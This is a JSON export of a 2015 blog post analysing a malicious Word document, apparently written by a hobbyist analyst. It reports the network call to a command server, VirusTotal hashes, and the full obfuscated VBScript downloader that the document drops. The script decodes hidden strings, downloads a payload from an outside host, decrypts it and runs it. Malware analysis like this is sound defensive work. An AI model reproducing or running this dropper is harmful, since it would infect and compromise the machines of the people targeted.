{"id":298,"date":"2015-12-20T16:45:20","date_gmt":"2015-12-20T16:45:20","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=298"},"modified":"2016-02-23T21:55:13","modified_gmt":"2016-02-23T21:55:13","slug":"damn-malicious-word-docs-part-2","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=298","title":{"rendered":"Damn Malicious Word docs – Part 2"},"content":{"rendered":"

So with the push of the Christmas season upon me and my family, it has taken some time to get back to this. So with that being said, I have come back to it only to find out that the malicious word doc is not working fully at the present time – most likely since the compromised server is no longer up\/has been fixed. But here is the little bit that I got from running the word doc.<\/p>\n

After running the malicious word doc within my test VM, I could see a call being made to an IP address of 176.107.176.60 on port 10025. Since it has been a while since this email was received, the compromised server has most likely been taken offline or fixed since there is no response as we can see in the PCAP:<\/p>\n

\"Wireshark<\/a>

Wireshark – No response from server<\/p><\/div>\n

\r\n\tGET \/1.jpg HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\n\tHost: 176.107.176.60:10025\r\n\tProxy-Connection: Keep-Alive\r\n\t<\/pre>\n
VirusTotal does show a record for this particular IP address as seen below:<\/p>\n
\tVirusTotal: http:\/\/www.virustotal.com\/en\/url\/63e556c39ffdf106335aed96e9cc8c26ee29cf8f47a5ecbd64727b53fbe6ced7\/analysis\/<\/a>
\n\tDetection ratio: 3 \/ 66
\n\tFirst Submission: 2015-12-15 13:04:13 UTC<\/p>\n
It also looks like it creates a new VBS file as well within the “C:\\Users\\Administrator\\AppData\\Roaming” folder called “14997.vbs.” VirusTotal did not have this listed in it’s database unfortunately. Here are those results from when I uploaded the file to VT:<\/p>\n
\tMD5: 3b4914287915f961ccc6e3b6eb2631c8
\n\tSHA256: d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40
\n\tFile size: 3.4KB
\n\tVirusTotal: http:\/\/www.virustotal.com\/en\/file\/d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40\/analysis\/1450624617\/<\/a>
\n\tFirst Submission: 2015-12-20 15:16:57 UTC
\n\tDetection ratio: 5 \/ 55<\/p>\n
Here is the script as well:<\/p>\n
\r\n\tDim UmjIXO2hir, KiaB14or7AP4MJs3N\r\n\tsub RvzNM87uD2Uk()\r\n\tDim Q8eF5tz, J1osO1Xdjhm\r\n\tFor Q8eF5tz = 21 To 2000369\r\n\tJ1osO1Xdjhm = AQ1rj2btk + 51 + 84 + 86\r\n\tNext\r\n\tEnd Sub\r\n\tFunction PW6zO9Wi2(ImpHrHkWLHm,JG8Z4Kmn2,JFc2vrhu0ju)\r\n\tDim L0A9lV2qvBLzt7I, XZSFk9ykDjRgHCE, DJrH, YxusiNzWR8z, LX9kL, SaZkf()\r\n\tSet XZSFk9ykDjRgHCE = CreateObject(P7aXJwQhP("3A05420047331E5F264720590552140E42350C0B7F0B5D221445", "Aif0i7Gw1"))\r\n\tSet DJrH = XZSFk9ykDjRgHCE.GEtFILE(ImpHrHkWLHm)\r\n\tSet LX9kL = DJrH.oPeNastExtStreaM(1, 0)\r\n\tSet YxusiNzWR8z = XZSFk9ykDjRgHCE.CreAtETEXtfiLe(JG8Z4Kmn2, 1, 0)\r\n\tL0A9lV2qvBLzt7I = 0\r\n\tReDim SaZkf(Len(JFc2vrhu0ju) - 1)\r\n\tFor L0A9lV2qvBLzt7I = 0 To UBound(SaZkf)\r\n\tSaZkf(L0A9lV2qvBLzt7I) = Asc(Mid(JFc2vrhu0ju, L0A9lV2qvBLzt7I + 1, 1))\r\n\tNext\r\n\tDo Until LX9kL.aTeNDOFStREAM\r\n\tL0A9lV2qvBLzt7I = (L0A9lV2qvBLzt7I + 1) \\ (UBound(SaZkf) + 1)\r\n\tYxusiNzWR8z.WrIte chr(Asc(LX9kL.REAd(1)) Xor SaZkf(L0A9lV2qvBLzt7I))\r\n\tLoop\r\n\tYxusiNzWR8z.Close\r\n\tLX9kL.Close\r\n\tSet LX9kL = Nothing\r\n\tSet DJrH = Nothing\r\n\tSet YxusiNzWR8z = Nothing\r\n\tSet XZSFk9ykDjRgHCE = Nothing\r\n\tEnd Function\r\n\tSub Olep7i7Kiur(MAyxtrNPneQ2NWZ7k)\r\n\tDim ClPZ\r\n\tClPZ = Timer + MAyxtrNPneQ2NWZ7k\r\n\tDo While Timer < ClPZ\r\n\tLoop\r\n\tEnd Sub\r\n\tSub RcEJWSKV4kbbHw()\r\n\tDim SMb0MjiAHbCa7ncac, NHgJOxl2hir\r\n\tSet SMb0MjiAHbCa7ncac = CreateObject(P7aXJwQhP("061524202D33186A1E0704353D", "YQFGRDClDMoa"))\r\n\tRvzNM87uD2Uk\r\n\tNGhXERANM = WscRIpT.sCriPtNAME\r\n\tNGhXERANM = Left(NGhXERANM, Len(NGhXERANM) - (2 + 7 + 2 - 7))\r\n\tUmjIXO2hir = SMb0MjiAHbCa7ncac.EXpAndENViRonmENtstRINGS(P7aXJwQhP("5024222503500C1661", "GuERUg1xwD")) & "\\" & NGhXERANM\r\n\tSet NHgJOxl2hir = CreateObject(P7aXJwQhP("22312A1D373A003E3D41000423101D3B08", "IoX"))\r\n\tNHgJOxl2hir.oPEn P7aXJwQhP("2E1363", "FiV704uNs05DkXL"), P7aXJwQhP("3D3B3B03737A607E447F7B7E7F44676478795D7F65757E4379677A6042673F3F28", "IUOOs"), 0\r\n\tNHgJOxl2hir.SEnD()\r\n\tif NHgJOxl2hir.reADYSTAtE = (2 + 5 + 2 - 5) and NHgJOxl2hir.statuS = (100 + 1 + 100 - 1) then\r\n\tRvzNM87uD2Uk\r\n\tA9EyFbvfiiPnu NHgJOxl2hir.ReSPONSEBoDy\r\n\tend if\r\n\tEnd Sub\r\n\tPxhu5jG3sVJvW\r\n\tFunction P7aXJwQhP(GicLFzK4z, WuDVCowp4c)\r\n\tDim KED4i4J41QJIrnYE, XCUpD, QbspWznb91\r\n\tFor KED4i4J41QJIrnYE = 1 To (Len(GicLFzK4z) \/ 2)\r\n\tXCUpD = (Chr(38) & Chr(72) & (Mid(GicLFzK4z, (KED4i4J41QJIrnYE + KED4i4J41QJIrnYE) - 1, 2)))\r\n\tQbspWznb91 = (Asc(Mid(WuDVCowp4c, ((KED4i4J41QJIrnYE Mod Len(WuDVCowp4c)) + 1), 1)))\r\n\tP7aXJwQhP = P7aXJwQhP + chr(XCUpD Xor QbspWznb91)\r\n\tNext\r\n\tEnd Function\r\n\tsub Pxhu5jG3sVJvW()\r\n\tDim DOPo6yeQIQ0KMjs, PsGNJpm5ejbM, TlscH7mFdrkHWvBFz\r\n\tDOPo6yeQIQ0KMjs = 91255263: PsGNJpm5ejbM = 0: TlscH7mFdrkHWvBFz = 0\r\n\tFor PsGNJpm5ejbM = 1 To DOPo6yeQIQ0KMjs\r\n\tTlscH7mFdrkHWvBFz = TlscH7mFdrkHWvBFz + 1\r\n\tNext\r\n\tIf TlscH7mFdrkHWvBFz = DOPo6yeQIQ0KMjs Then\r\n\tOlep7i7Kiur (4)\r\n\tRcEJWSKV4kbbHw\r\n\tXAwnfxrYiA4\r\n\tElse\r\n\tMsgBox "87", 16, "17"\r\n\tEnd If\r\n\tEnd Sub\r\n\tSub A9EyFbvfiiPnu(YHT33KI3x4xVelz7)\r\n\tDim Su8OPyfzt4Ku45ua\r\n\tSet Su8OPyfzt4Ku45ua = CreateObject(P7aXJwQhP("120738740C6F6102370C2621", "TSCw0NA2vEiGLd"))\r\n\tSu8OPyfzt4Ku45ua.opEn\r\n\tSu8OPyfzt4Ku45ua.tYpE = 1\r\n\tSu8OPyfzt4Ku45ua.WRITe YHT33KI3x4xVelz7\r\n\tSu8OPyfzt4Ku45ua.SAVEToFilE UmjIXO2hir, (1 + 5 + 1 - 5)\r\n\tSu8OPyfzt4Ku45ua.Close\r\n\tOlep7i7Kiur (2)\r\n\tKiaB14or7AP4MJs3N = UmjIXO2hir\r\n\tUmjIXO2hir = UmjIXO2hir & second(time) & P7aXJwQhP("57521501", "Qy7md1eKE5CxqP")\r\n\tPW6zO9Wi2 KiaB14or7AP4MJs3N, UmjIXO2hir, P7aXJwQhP("355100765445", "UT3cGfvjM4")\r\n\tEnd Sub\r\n\tSub XAwnfxrYiA4()\r\n\tCreateObject(P7aXJwQhP("60240C2A0769723C192A02245238002905", "G3LiFk")).sHELLexECUte UmjIXO2hir, "", "", P7aXJwQhP("1A43520F", "Nu37aPdZsl"), 1\r\n\tEnd sub\r\n\t<\/pre>\n
I have also gotten a video of the VM when I started running the malicious Word document which you can watch here<\/a>. The interesting thing about the Word doc is that the script that it creates in the Appdata\/Roaming folder has different names when you run it. I noticed this when messing around with VirtualBox and trying to get the video recording setup correctly. The name of the file always changed, but the error that it gave, and the IP\/port combination that it tried to contact always stayed the same.<\/p>\n","protected":false},"excerpt":{"rendered":"
So with the push of the Christmas season upon me and my family, it has taken some time to get back to this. So with that being said, I have come back to it only to find out that the malicious word doc is not working fully at the present time – most likely since the compromised server is no longer up\/has been fixed. But here is the little bit that I got from running the word doc. After running the malicious word doc within my test VM, I could see a call being made to an IP address of…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-298","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/298","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=298"}],"version-history":[{"count":1,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/298\/revisions"}],"predecessor-version":[{"id":300,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/298\/revisions\/300"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=298"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=298"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=298"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}